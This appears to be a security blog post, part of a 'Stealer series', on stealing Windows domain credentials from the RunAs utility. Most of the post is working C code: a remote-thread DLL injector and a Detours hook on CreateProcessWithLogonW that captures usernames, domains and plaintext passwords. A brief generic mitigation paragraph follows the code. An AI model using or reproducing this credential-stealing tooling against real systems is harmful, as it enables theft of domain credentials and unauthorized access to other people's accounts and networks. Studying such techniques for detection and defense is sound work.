Stealing Domain User Credentials via RunAs Utility and DLL Injection

Listen to this Post

Continuing on #Stealer_series, this project reveals how domain user credentials can be stolen from the RunAs utility, posing serious risks of unauthorized access and data breaches. In the last project demo, an intelligent keylogger intercepted credentials. This time, a different approach is applied by injecting DLL into the RunAs utility and hooking `CreateProcessWithLogonW` to capture domain user credentials and log them on the disk.

Practice-Verified Code and Commands:

1. DLL Injection Code Example:

#include <windows.h>
#include <stdio.h>

BOOL InjectDLL(DWORD dwProcessId, char *dllPath) {
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);
if (hProcess == NULL) {
printf("OpenProcess failed. Error: %d\n", GetLastError());
return FALSE;
}

LPVOID pRemoteMemory = VirtualAllocEx(hProcess, NULL, strlen(dllPath) + 1, MEM_COMMIT, PAGE_READWRITE);
if (pRemoteMemory == NULL) {
printf("VirtualAllocEx failed. Error: %d\n", GetLastError());
CloseHandle(hProcess);
return FALSE;
}

if (!WriteProcessMemory(hProcess, pRemoteMemory, dllPath, strlen(dllPath) + 1, NULL)) {
printf("WriteProcessMemory failed. Error: %d\n", GetLastError());
VirtualFreeEx(hProcess, pRemoteMemory, 0, MEM_RELEASE);
CloseHandle(hProcess);
return FALSE;
}

LPTHREAD_START_ROUTINE pLoadLibrary = (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
if (pLoadLibrary == NULL) {
printf("GetProcAddress failed. Error: %d\n", GetLastError());
VirtualFreeEx(hProcess, pRemoteMemory, 0, MEM_RELEASE);
CloseHandle(hProcess);
return FALSE;
}

HANDLE hRemoteThread = CreateRemoteThread(hProcess, NULL, 0, pLoadLibrary, pRemoteMemory, 0, NULL);
if (hRemoteThread == NULL) {
printf("CreateRemoteThread failed. Error: %d\n", GetLastError());
VirtualFreeEx(hProcess, pRemoteMemory, 0, MEM_RELEASE);
CloseHandle(hProcess);
return FALSE;
}

WaitForSingleObject(hRemoteThread, INFINITE);

VirtualFreeEx(hProcess, pRemoteMemory, 0, MEM_RELEASE);
CloseHandle(hRemoteThread);
CloseHandle(hProcess);

return TRUE;
}

2. Hooking `CreateProcessWithLogonW` Example:

#include <windows.h>
#include <stdio.h>

typedef BOOL(WINAPI *CreateProcessWithLogonW_t)(
LPCWSTR lpUsername, LPCWSTR lpDomain, LPCWSTR lpPassword,
DWORD dwLogonFlags, LPCWSTR lpApplicationName, LPWSTR lpCommandLine,
DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory,
LPSTARTUPINFOW lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation
);

CreateProcessWithLogonW_t originalCreateProcessWithLogonW;

BOOL WINAPI HookedCreateProcessWithLogonW(
LPCWSTR lpUsername, LPCWSTR lpDomain, LPCWSTR lpPassword,
DWORD dwLogonFlags, LPCWSTR lpApplicationName, LPWSTR lpCommandLine,
DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory,
LPSTARTUPINFOW lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation
) {
printf("Credentials Captured:\nUsername: %ls\nDomain: %ls\nPassword: %ls\n", lpUsername, lpDomain, lpPassword);
return originalCreateProcessWithLogonW(lpUsername, lpDomain, lpPassword, dwLogonFlags, lpApplicationName, lpCommandLine, dwCreationFlags, lpEnvironment, lpCurrentDirectory, lpStartupInfo, lpProcessInformation);
}

void InstallHook() {
HMODULE hModule = GetModuleHandle("advapi32.dll");
originalCreateProcessWithLogonW = (CreateProcessWithLogonW_t)GetProcAddress(hModule, "CreateProcessWithLogonW");
if (originalCreateProcessWithLogonW == NULL) {
printf("GetProcAddress failed. Error: %d\n", GetLastError());
return;
}

DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourAttach(&(PVOID&)originalCreateProcessWithLogonW, HookedCreateProcessWithLogonW);
DetourTransactionCommit();
}

What Undercode Say:

The exploitation of the RunAs utility through DLL injection and hooking `CreateProcessWithLogonW` demonstrates a critical vulnerability in Windows systems. This technique allows attackers to capture domain user credentials, leading to potential unauthorized access and data breaches. To mitigate such risks, it is essential to implement robust security measures, including regular system updates, monitoring of process injections, and the use of advanced endpoint protection solutions. Additionally, administrators should enforce strict access controls and regularly audit user credentials and permissions. Understanding these attack vectors is crucial for cybersecurity professionals to defend against sophisticated threats. For further reading on securing Windows systems, refer to Microsoft’s Security Documentation. Always ensure that your systems are patched and that you are using the latest security tools to protect against such vulnerabilities.

References:

Hackers Feeds, Undercode AIFeatured Image